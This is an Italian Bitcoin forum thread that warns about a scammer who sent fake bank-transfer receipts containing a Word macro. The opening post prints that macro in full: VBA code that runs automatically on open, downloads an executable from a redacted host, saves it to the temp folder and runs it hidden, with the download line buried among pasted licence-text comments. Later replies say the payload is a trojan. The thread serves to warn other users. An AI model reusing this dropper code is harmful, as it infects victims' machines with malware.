Author

Topic: [SCAM][LAMER] ans3lm0 (Read 1722 times)

hero member
Activity: 586
Merit: 506
Elite Exchanger
May 08, 2014, 04:25:20 PM
#7
La macro scarica questo: objXMLHTTP.Open "GET", "XXX://XX/api/1/files/XXXXX/0/blob?download", False
e lo esegue.

Però il get l'aveva ficcato in mezzo ai blablabla di office (Thanks for) haha geniale!

già, però piu che geniale io lo definirei un piccolo  lamer..  Grin
newbie
Activity: 7
Merit: 0
May 08, 2014, 04:29:05 AM
#6
La macro scarica questo: objXMLHTTP.Open "GET", "XXX://XX/api/1/files/XXXXX/0/blob?download", False
e lo esegue.

Però il get l'aveva ficcato in mezzo ai blablabla di office (Thanks for) haha geniale!
hero member
Activity: 586
Merit: 506
Elite Exchanger
April 30, 2014, 02:45:49 PM
#5
Ma scusate con quella macro cosa poteva riuscire a fare se l'avreste attivata dal documento, perchè una volta anche a me è capitato, ma su questo pc non ho nulla di importante.

Quella macro scaricava un trojan. 
member
Activity: 84
Merit: 10
Comprate i vostri BTC, aiuto anche per i Newbie :)
April 30, 2014, 02:41:08 PM
#4
Ma scusate con quella macro cosa poteva riuscire a fare se l'avreste attivata dal documento, perchè una volta anche a me è capitato, ma su questo pc non ho nulla di importante.
hero member
Activity: 586
Merit: 506
Elite Exchanger
April 30, 2014, 07:44:20 AM
#3
Ma chi è sto coglione?
si poteva capire che era una inculat.. quando ti ha chiesto se hai Word.....




Si infatti l'avevo capito ma ho voluto fargli credere (per qualche minuto) che ci era riuscito ...
Questo è un altro coglione che come tutti gli altri suoi simili ci provano quotidianamente,  e poi puntualmente si ritrovano qui in blacklist.


 
hero member
Activity: 658
Merit: 504
Bullandterrier
April 30, 2014, 07:04:41 AM
#2
Ma chi è sto coglione?
si poteva capire che era una inculat.. quando ti ha chiesto se hai Word.....

hero member
Activity: 586
Merit: 506
Elite Exchanger
April 28, 2014, 07:27:33 PM
#1
Nick: ans3lm0
Profilo: https://bitcointalksearch.org/user/ans3lm0-260341

Segnalo questo scammer lamer  che invia  ricevute di bonifici con macro (LoL) . Poveri illusi continuate pure.

Welcome to my blacklist!

PM:



Email:










Contenuto della macro:
Code:
Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Option Explicit


Sub view()
    On Error Resume Next
   
    Dim objXMLHTTP As Object
    Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
    Dim objADOStream As Object
    Dim objFSO As Object
    Dim wsh As Object
    Dim objExecObject As Object
    Dim shellcode As String
    Dim fullpath As String
    Dim tempDirectory As String
    Set wsh = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
   
    MsgBox "Attendere...", vbOKOnly, "Informazione"
   
   ' Thank you for choosing Microsoft Office 2013. This is a license agreement between you and Microsoft Corporation (or, based on where you live, one of its affiliates) that describes your rights to use the Office 2013 software. For your convenience, we've organized this agreement into two parts. The first part includes introductory terms; the Additional Terms and Limited Warranty follow and contain greater detail. You should review the entire agreement, including any linked terms, because all of the terms are important and together create this contract that applies to you. You can review linked terms by pasting the forward link into your browser window. THE ADDITIONAL TERMS CONTAIN A BINDING ARBITRATION CLAUSE AND CLASS ACTION WAIVER. IF YOU LIVE IN THE UNITED STATES, THESE AFFECT YOUR RIGHTS TO RESOLVE A DISPUTE WITH MICROSOFT, AND YOU SHOULD READ THEM CAREFULLY.
   ' BY ACCEPTING THIS AGREEMENT OR USING THE SOFTWARE, YOU AGREE TO ALL OF THESE TERMS AND CONSENT TO THE TRANSMISSION OF CERTAIN INFORMATION DURING ACTIVATION AND FOR INTERNET-BASED FEATURES OF THE SOFTWARE. IF YOU DO NOT ACCEPT AND COMPLY WITH THESE TERMS, YOU MAY NOT USE THE SOFTWARE OR FEATURES. Instead, you should return it to the retailer or other place where you purchased the software license, for a refund or credit.
    objXMLHTTP.Open "GET", "XXX://XX/api/1/files/XXXXX/0/blob?download", False
   ' Thank you for choosing Microsoft Office 2013. This is a license agreement between you and Microsoft Corporation (or, based on where you live, one of its affiliates) that describes your rights to use the Office 2013 software. For your convenience, we've organized this agreement into two parts. The first part includes introductory terms; the Additional Terms and Limited Warranty follow and contain greater detail. You should review the entire agreement, including any linked terms, because all of the terms are important and together create this contract that applies to you. You can review linked terms by pasting the forward link into your browser window. THE ADDITIONAL TERMS CONTAIN A BINDING ARBITRATION CLAUSE AND CLASS ACTION WAIVER. IF YOU LIVE IN THE UNITED STATES, THESE AFFECT YOUR RIGHTS TO RESOLVE A DISPUTE WITH MICROSOFT, AND YOU SHOULD READ THEM CAREFULLY.
   '  BY ACCEPTING THIS AGREEMENT OR USING THE SOFTWARE, YOU AGREE TO ALL OF THESE TERMS AND CONSENT TO THE TRANSMISSION OF CERTAIN INFORMATION DURING ACTIVATION AND FOR INTERNET-BASED FEATURES OF THE SOFTWARE. IF YOU DO NOT ACCEPT AND COMPLY WITH THESE TERMS, YOU MAY NOT USE THE SOFTWARE OR FEATURES. Instead, you should return it to the retailer or other place where you purchased the software license, for a refund or credit.
    objXMLHTTP.Send
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    tempDirectory = Environ("TEMP")
   
   
    fullpath = tempDirectory & "\vbtre.exe "
   
   
    If objFSO.FileExists(fullpath) Then
        wsh.Run fullpath & shellcode, 0
    Else
        objADOStream.SaveToFile fullpath
        objADOStream.Close
        wsh.Run fullpath & shellcode, 0
    End If
   
    Set wsh = Nothing
    Set objXMLHTTP = Nothing
    Set objADOStream = Nothing
    Set objFSO = Nothing
    Set objExecObject = Nothing
   
   
    On Error GoTo 0
End Sub

Sub AutoOpen()
    view
End Sub
Jump to: